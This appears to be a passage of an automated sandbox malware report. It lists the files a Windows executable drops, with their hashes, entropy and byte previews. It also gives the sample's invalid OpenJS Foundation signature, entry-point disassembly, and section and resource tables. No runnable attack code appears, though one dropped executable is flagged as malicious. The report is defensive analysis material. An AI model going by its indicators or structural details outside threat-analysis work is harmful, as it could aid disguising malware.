                                                                                                                                                                                                                      SHA1:D20E84D3054271DE92A785627BDA5EC1C3007BDE
                                                                                                                                                                                                                      SHA-256:2EE91362BBE22AADA4D879FA18DFC5FDA57700BD8255B084789339C6950148A2
                                                                                                                                                                                                                      SHA-512:ECCA4E8BECC0E3AEDE806AA0B45EE648085F821A597A7E827D401AE92EA68E371E967C511B44E2D4CDE114F05BD52768BAD0B3E26D5B8CD9F4EEBB27F8FBABDA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR...P............7.. .IDATx..;..G..z.....{-A....m..}A........#w.#W.=..&.r.....6..........W\.dFg......F.o...:.2.A.q...........}./ ..`.....6.c...../.~.|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x.......$...$..uC...[c$.1p...`.FH>..[H>..#B.d.uU....@k..[f^uwg0$...v.c.G.u......2.n...b..V.@... ......g..@.%.c.0..?s}.0v..&..1...K...1..#..}......$.....6..k.D..n.~e.....H..K)..A..+|..$[.|.u]........Rp....^.1&...M...p.=...H........~%......{.{.........."h.......@S...>..A...B..o..w....a..4[7.9...q....|$....H..Xh:..W.H..%..O..G..V..e...|...b....B....N..............7..[...d-.:.~....c...............-.o............9.....,...-.-.oj.=....{.|.$c|..J.Ld..`.J.)Qi=......d..h.V.....`Z.j.AB...K.7=...k.....p!.^..j.Q...8....-..$.....~]:..$..(_J...C..RH.....o..!....H>..EA.dH...T.....Jr...v.bD....B........6.{....._.... P.{....m
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1276017
                                                                                                                                                                                                                      Entropy (8bit):7.663050492492285
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:b2IvDr159I4l3Jc3uBrXbo0B/QlR1p7TJ8zfAY72QDd:d3i3uBrcn1tJAx2wd
                                                                                                                                                                                                                      MD5:3DEFAEE4278E5340B030739CA1E2BCED
                                                                                                                                                                                                                      SHA1:BFEF9CCC147E484807C890D7F9B23401810EF4B9
                                                                                                                                                                                                                      SHA-256:4AFE0EB47487B3CB992366E2B950C5B7820E6165A7862BEF800CC22E4102CDB8
                                                                                                                                                                                                                      SHA-512:BB1123C88F605753802A84F2954DB83E25337B7A09A3F3ABB7EF125A030159105654A5C8C632A7D9532AB82AAF326A90CBDAD82547B00066E7DD8B09CBBDC775
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..=v..=v..=v..=v..=v.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..<v..m&..i7..p...R...I*..S...N*..\...p...a&..Z...N*..\...Mv..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t...T...G...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..~...I...N...^...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t8..oS..T...N....8..a0..P...O...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v...F..A.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1276017
                                                                                                                                                                                                                      Entropy (8bit):7.663050492492285
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:b2IvDr159I4l3Jc3uBrXbo0B/QlR1p7TJ8zfAY72QDd:d3i3uBrcn1tJAx2wd
                                                                                                                                                                                                                      MD5:3DEFAEE4278E5340B030739CA1E2BCED
                                                                                                                                                                                                                      SHA1:BFEF9CCC147E484807C890D7F9B23401810EF4B9
                                                                                                                                                                                                                      SHA-256:4AFE0EB47487B3CB992366E2B950C5B7820E6165A7862BEF800CC22E4102CDB8
                                                                                                                                                                                                                      SHA-512:BB1123C88F605753802A84F2954DB83E25337B7A09A3F3ABB7EF125A030159105654A5C8C632A7D9532AB82AAF326A90CBDAD82547B00066E7DD8B09CBBDC775
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..=v..=v..=v..=v..=v.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..<v..m&..i7..p...R...I*..S...N*..\...p...a&..Z...N*..\...Mv..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t...T...G...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..~...I...N...^...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t8..oS..T...N....8..a0..P...O...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v...F..A.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v
                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):544256
                                                                                                                                                                                                                      Entropy (8bit):6.52754951546901
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:F/zTlHFqRB2rAikFpF5ibr4jGq88DUqlL6PHtqekY:cRBzj5ifj8DHoftqeH
                                                                                                                                                                                                                      MD5:BE34377934380A888F46809916989EF2
                                                                                                                                                                                                                      SHA1:B2E98C16C4F19E128EB243E5427C2904A6D8D9FD
                                                                                                                                                                                                                      SHA-256:9ECACDB5102C2543CFEA48CB11808EB7C92331F5F3D107990271F9D53CAB20FD
                                                                                                                                                                                                                      SHA-512:B26303F92EA1E387BBE4C4DE7961255D3485B77E5FD621D79F59CCBB7ECFAE5AC5E160AA4D93896DB978D6D1864703967B1DF58C8439490E0B9F947652D1533D
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...*...*...*..)...*../.r.*......*..)...*../..*.......*......*..+...*...+.?.*...#...*.......*...(...*.Rich..*.........PE..L....m.\..........................................@.......................................@..................................5...................................E..l...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bhla.......... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):544256
                                                                                                                                                                                                                      Entropy (8bit):6.52754951546901
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:F/zTlHFqRB2rAikFpF5ibr4jGq88DUqlL6PHtqekY:cRBzj5ifj8DHoftqeH
                                                                                                                                                                                                                      MD5:BE34377934380A888F46809916989EF2
                                                                                                                                                                                                                      SHA1:B2E98C16C4F19E128EB243E5427C2904A6D8D9FD
                                                                                                                                                                                                                      SHA-256:9ECACDB5102C2543CFEA48CB11808EB7C92331F5F3D107990271F9D53CAB20FD
                                                                                                                                                                                                                      SHA-512:B26303F92EA1E387BBE4C4DE7961255D3485B77E5FD621D79F59CCBB7ECFAE5AC5E160AA4D93896DB978D6D1864703967B1DF58C8439490E0B9F947652D1533D
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...*...*...*..)...*../.r.*......*..)...*../..*.......*......*..+...*...+.?.*...#...*.......*...(...*.Rich..*.........PE..L....m.\..........................................@.......................................@..................................5...................................E..l...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bhla.......... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):278
                                                                                                                                                                                                                      Entropy (8bit):3.5207850851862132
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:mzQu8fFMsUEZglJPZCylQJ7tFYSoQI/uy0lbqglP1:RumFMsMJPfQI/uV13
                                                                                                                                                                                                                      MD5:ED8615CBCCCC6C24981A4F45857FC1BA
                                                                                                                                                                                                                      SHA1:6871B3107392584509E48AE45DC7B38D6A1DAE4D
                                                                                                                                                                                                                      SHA-256:2E9DBE1ACBD267749101386CB3D3F8C524BA8E318A151A1DDDBB5C6BB5F53175
                                                                                                                                                                                                                      SHA-512:96C3B663DF515D07D30F38825B8C31F95F2D2F4C4D95DED43873CB03AC1AD6C6731B50D81C281DF047890DA0E71A5048FF496BB82B3A53AD43E321122DB0BF18
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........ZdB.n..m?..F.......<... ................ ....................7.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.l.s.S.e.r.v.e.r.\.Q.T.A.g.e.n.t._.4.0...e.x.e.........T.I.N.A.-.P.C.\.t.i.n.a...................0.........1.....................................
                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                      Entropy (8bit):7.568075035654234
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                      File name:BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                      File size:13'599'640 bytes
                                                                                                                                                                                                                      MD5:c52c721e095a91bb0d589dd0206d5f3d
                                                                                                                                                                                                                      SHA1:2089df73d6ec0b8c193ddf39bda7e603a0a0bd0a
                                                                                                                                                                                                                      SHA256:331f38a2128e273ac865be7c6722d4107ebf0cc77a5abd46965492dbad0fadf5
                                                                                                                                                                                                                      SHA512:7b443010ea96dd5af76d025e86625697a6598e7c56937ca894fc70cebaef145ad7022ee08176f388b188ed958b392ca4dfee97528de9830ad0ae19708c60d87b
                                                                                                                                                                                                                      SSDEEP:393216:FaiZooCZlPTqI33zfLZhCWZgiXwVsHVsSjsi4AlB969ChJhE8ZI+0:FKLgVsTlxlzvo
                                                                                                                                                                                                                      TLSH:B7D6D013B680543BD0671A3A8C2B97A56D3FBE203A268DD76BB46C8C0F357817D25787
                                                                                                                                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                      Icon Hash:0f3bfcfc7979130e
                                                                                                                                                                                                                      Entrypoint:0x912ea4
                                                                                                                                                                                                                      Entrypoint Section:.itext
                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                                                                      Time Stamp:0x53E1E43C [Wed Aug 6 08:15:56 2014 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                      Import Hash:9e472ee86ae4f761d7e7f5369c909694
                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                      Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                      • 01/10/2020 20:00:00 18/12/2023 07:00:00
                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                      • CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                      Thumbprint MD5:8E8056A2284F0304445ED325353454BF
                                                                                                                                                                                                                      Thumbprint SHA-1:E16BB6EE4ED3935C46C356D147E811286BA4BBFE
                                                                                                                                                                                                                      Thumbprint SHA-256:968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
                                                                                                                                                                                                                      Serial:038EDB2FC6E405731A760F1516144C85
                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                      mov ecx, 00000009h
                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                      dec ecx
                                                                                                                                                                                                                      jne 00007F6978AFFFCBh
                                                                                                                                                                                                                      push ecx
                                                                                                                                                                                                                      mov eax, 00902D2Ch
                                                                                                                                                                                                                      call 00007F69785FA11Bh
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                      push 00913101h
                                                                                                                                                                                                                      push dword ptr fs:[eax]
                                                                                                                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                      mov eax, dword ptr [009367ACh]
                                                                                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                                                                                      call 00007F697875BF35h
                                                                                                                                                                                                                      lea edx, dword ptr [ebp-14h]
                                                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                                                      call 00007F69785F1C88h
                                                                                                                                                                                                                      mov eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                      mov edx, 0091311Ch
                                                                                                                                                                                                                      call 00007F69785F6ED3h
                                                                                                                                                                                                                      jne 00007F6978AFFFD9h
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      call 00007F6978AE2C6Eh
                                                                                                                                                                                                                      lea edx, dword ptr [ebp-18h]
                                                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                                                      call 00007F69785F1C65h
                                                                                                                                                                                                                      mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                                                      mov edx, 00913134h
                                                                                                                                                                                                                      call 00007F69785F6EB0h
                                                                                                                                                                                                                      jne 00007F6978AFFFD9h
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      call 00007F6978AEA0A3h
                                                                                                                                                                                                                      lea edx, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                                                      call 00007F69785F1C42h
                                                                                                                                                                                                                      mov eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                                                      mov edx, 00913150h
                                                                                                                                                                                                                      call 00007F69785F6E8Dh
                                                                                                                                                                                                                      jne 00007F6978AFFFD9h
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      call 00007F6978AEC3D8h
                                                                                                                                                                                                                      lea edx, dword ptr [ebp-20h]
                                                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                                                      call 00007F69785F1C1Fh
                                                                                                                                                                                                                      mov eax, dword ptr [ebp-20h]
                                                                                                                                                                                                                      mov edx, 00913174h
                                                                                                                                                                                                                      call 00007F69785F6E6Ah
                                                                                                                                                                                                                      jne 00007F6978AFFFD9h
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      call 00007F6978AE6B0Dh
                                                                                                                                                                                                                      lea edx, dword ptr [ebp-24h]
                                                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5d90000x5504.idata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6430000x1f3d26.rsrc
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xcf65200x1e78
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e20000x60ab8
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x5e10000x18.rdata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x5d9fbc0xcd8.idata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5df0000x8f6.didata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                      .text0x10000x50ddf40x50de00fc6cc79d6ca6ea0c8da8814a39bbe7ceunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .itext0x50f0000x42940x44006ac8f04f8a720d4d2a77f5a0672b4385False0.47506893382352944data6.215259000231368IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .data0x5140000x22f1c0x23000aa33e21e9305d922a9bd46c69a3e31edFalse0.4722865513392857data6.467275977175512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .bss0x5370000xa1f900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .idata0x5d90000x55040x56000abc2f57bd03b8a36a1efe5056c2abc5False0.302734375data5.272161535175131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .didata0x5df0000x8f60xa00c11dbc6817004ff35b3bdefe6f0233aeFalse0.3390625data3.9282350697867483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .tls0x5e00000xbc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .rdata0x5e10000x180x200a73894ac51114a1877dfce9dde2aac91False0.052734375data0.17014565200323517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .reloc0x5e20000x60a800x60c0094af7743f162bac00c41a551757fa177False0.5484672763242894data6.698598102325675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .rsrc0x6430000x1f3d260x1f3e004036dd8b8ff1f225c09b5eb9842db991False0.8111451691047762data7.640674116196193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                      ETYM0x645e840x156c74PNG image data, 4432 x 696, 8-bit/color RGB, non-interlacedEnglishUnited States0.9941558837890625
                                                                                                                                                                                                                      UNICODEDATA0x79caf80x723fdata0.36769583205115053
                                                                                                                                                                                                                      UNICODEDATA0x7a3d380x7ebddata0.42552011095700415
                                                                                                                                                                                                                      UNICODEDATA0x7abbf80x6a8data0.5985915492957746
                                                                                                                                                                                                                      UNICODEDATA0x7ac2a00xaf7ddata0.4191430161380078
                                                                                                                                                                                                                      UNICODEDATA0x7b72200xd3cfdata0.4500857569666009
                                                                                                                                                                                                                      UNICODEDATA0x7c45f00x14c5data0.6482979123565921
                                                                                                                                                                                                                      RT_CURSOR0x7c5ab80x134dataSpanishArgentina0.4935064935064935
                                                                                                                                                                                                                      RT_CURSOR0x7c5bec0x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                                                      RT_CURSOR0x7c5d200x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                                                      RT_CURSOR0x7c5e540x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                                                      RT_CURSOR0x7c5f880x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                                                      RT_CURSOR0x7c60bc0x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                                                      RT_CURSOR0x7c61f00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                      RT_CURSOR0x7c63240x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19385026737967914
                                                                                                                                                                                                                      RT_CURSOR0x7c66100x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.18716577540106952
                                                                                                                                                                                                                      RT_CURSOR0x7c68fc0x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.2179144385026738
                                                                                                                                                                                                                      RT_CURSOR0x7c6be80x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.21122994652406418
                                                                                                                                                                                                                      RT_CURSOR0x7c6ed40x134AmigaOS bitmap font "(", fc_YSize 4294967064, 3584 elements, 2nd "\377\270w\377\377\370\177\377\377\370\177\377\377\370\177\377\377\370\177\377\377\370\177\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdGermanGermany0.32792207792207795
                                                                                                                                                                                                                      RT_CURSOR0x7c70080x134data0.42207792207792205
                                                                                                                                                                                                                      RT_CURSOR0x7c713c0x134Targa image data 64 x 65536 x 1 +32 "\001"0.3538961038961039
                                                                                                                                                                                                                      RT_CURSOR0x7c72700x134dataSpanishArgentina0.39285714285714285
                                                                                                                                                                                                                      RT_CURSOR0x7c73a40x134Targa image data 64 x 65536 x 1 +32 "\001"0.3961038961038961
                                                                                                                                                                                                                      RT_CURSOR0x7c74d80x134Targa image data 64 x 65536 x 1 +32 "\001"0.31493506493506496
                                                                                                                                                                                                                      RT_CURSOR0x7c760c0x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.32792207792207795
                                                                                                                                                                                                                      RT_CURSOR0x7c77400x134Targa image data 64 x 65536 x 1 +32 "\001"GermanGermany0.5292207792207793
                                                                                                                                                                                                                      RT_CURSOR0x7c78740x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.18983957219251338
                                                                                                                                                                                                                      RT_CURSOR0x7c7b600x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19117647058823528
                                                                                                                                                                                                                      RT_CURSOR0x7c7e4c0x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19786096256684493
                                                                                                                                                                                                                      RT_CURSOR0x7c81380x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.18983957219251338
                                                                                                                                                                                                                      RT_CURSOR0x7c84240x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19518716577540107
                                                                                                                                                                                                                      RT_CURSOR0x7c87100x2ecTarga image data 64 x 65536 x 1 +32 "\004"GermanGermany0.19518716577540107
                                                                                                                                                                                                                      RT_CURSOR0x7c89fc0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                      RT_BITMAP0x7c8b300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                                                      RT_BITMAP0x7c8d000x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                                                                                                      RT_BITMAP0x7c8ee40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                                                      RT_BITMAP0x7c90b40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                                                                                                      RT_BITMAP0x7c92840x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                                                                                                      RT_BITMAP0x7c94540x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                                                                                      RT_BITMAP0x7c96240x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                                                                                                      RT_BITMAP0x7c97f40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                      RT_BITMAP0x7c99c40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                                                                                                      RT_BITMAP0x7c9b940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                                                      RT_BITMAP0x7c9d640xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                                                                                                                                                                      RT_BITMAP0x7c9e240xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                                                                                                                                                                      RT_BITMAP0x7c9f040xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                                                                                                                                                                      RT_BITMAP0x7c9fe40xb0Device independent bitmap graphic, 9 x 9 x 4, image size 72EnglishUnited States0.3977272727272727
                                                                                                                                                                                                                      RT_BITMAP0x7ca0940xb0Device independent bitmap graphic, 9 x 9 x 4, image size 72EnglishUnited States0.42613636363636365
                                                                                                                                                                                                                      RT_BITMAP0x7ca1440xa28Device independent bitmap graphic, 96 x 16 x 8, image size 15360.24884615384615386
                                                                                                                                                                                                                      RT_BITMAP0x7cab6c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                                                                                                                                                                      RT_BITMAP0x7cac4c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                                                                                                                                                                      RT_BITMAP0x7cad0c0x528Device independent bitmap graphic, 16 x 16 x 8, image size 256ChineseChina0.4
